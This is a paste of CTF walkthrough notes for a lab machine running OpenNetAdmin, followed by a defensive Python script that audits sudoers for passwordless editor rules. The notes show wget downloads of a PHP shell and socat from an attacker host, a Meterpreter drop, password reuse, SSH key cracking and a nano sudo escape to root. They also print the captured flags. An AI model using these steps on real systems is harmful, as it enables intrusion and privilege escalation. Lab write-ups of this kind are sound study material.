Untitled
a guest
Mar 5th, 2020

Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/rockyou.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/02/04 15:25:17 Starting gobuster
===============================================================
/sierra (Status: 301)
/music (Status: 301)
[ERROR] 2020/02/04 15:25:30 [!] parse http://10.10.10.171/!@#$%^: invalid URL escape "%^"
/marga (Status: 301)
[ERROR] 2020/02/04 15:26:07 [!] parse http://10.10.10.171/!"£$%^: invalid URL escape "%^"
[ERROR] 2020/02/04 15:26:11 [!] parse http://10.10.10.171/!@#$%^&*(): invalid URL escape "%^&"
/?????? (Status: 200)

Went to /music... hit login button on music screen... redirected to 10.10.10.171/ona/

used RCE exploit found here https://www.exploit-db.com/exploits/47691

./script.sh http://10.10.10.171/ona/
$ wget 10.10.14.23:9002/shell.php
$ wget 10.10.14.23:9002/socat
$ chmod +x socat

talk about getting new socat binary because of nc not working and the architecture

drop meterpreter binary

/opt/ona/www/local/config/database_settings.inc.php: found db creds

$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

tried to connect to db, didn't work...
tried to su to jimmy... used n1nj4W4rri0R! as pw

we in

Jimmy has permissions to a new directory, /var/www/internal
new internal webpage on port 52846
use ssh port forwarding to be able to see the webpage on the internal machine
"ssh -L 9002:127.0.0.1:52846 [email protected]" on local host
In the index file is a username and hash for the login of main.php
use online hash cracker to solve

Gives private ssh key for joanna.
crack key using ssh2john.py
get passwd bloodninjas

ssh in using key

user.txt
c9b2cf07d40807e62af62660f0c81b5f

sudo -l
can use nano with no password to see /opt/priv; root is also editing /opt/priv. Using GTFOBins, escape to a shell with:

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

root shell
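A defender-side check for the sudo misconfiguration these notes use: this added Python script (not part of the original paste) parses sudoers-style rules and flags NOPASSWD entries whose command is an editor or pager that GTFOBins documents as able to spawn a shell. The sudoers content below is constructed for the example; the joanna/nano line reproduces only the rule pattern described in the notes.

```python
import os
import re
import shlex

# Editors and pagers that GTFOBins documents as able to spawn a shell from inside
# the program; run as root under a NOPASSWD rule, each one is a passwordless root shell.
SHELL_ESCAPE_BINARIES = {"nano", "pico", "vi", "vim", "less", "more", "man", "ed"}

# Constructed sudoers content for this demonstration (not copied from any real host).
SAMPLE_SUDOERS = """\
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv   # the rule pattern from the notes
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
deploy  ALL=(root) /usr/bin/systemctl restart app
"""
# user  host=(runas) [TAG:] cmd [, [TAG:] cmd ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")

def parse_rules(text):
    """Yield (user, runas, nopasswd, command) for every command in a user specification."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False  # a tag applies to all following commands in the list
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while ":" in cmd and cmd.split(":", 1)[0].strip().isupper():
                tag, cmd = (s.strip() for s in cmd.split(":", 1))
                if tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
            yield m.group("user"), m.group("runas") or "root", nopasswd, cmd

def audit_sudoers(text):
    """Return (user, runas, binary, command) for passwordless rules on escapable binaries."""
    findings = []
    for user, runas, nopasswd, cmd in parse_rules(text):
        if not nopasswd or cmd == "ALL":
            continue
        binary = os.path.basename(shlex.split(cmd)[0])
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append((user, runas, binary, cmd))
    return findings

if __name__ == "__main__":
    print(*audit_sudoers(SAMPLE_SUDOERS), sep="\n")
```

The remediation the finding points at is to drop the NOPASSWD tag or to grant sudoedit on the file instead, since sudoedit runs the editor as the invoking user on a temporary copy rather than handing out a root editor process.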

root.txt
2f907ed450b361b2c2bf4e8795d5b561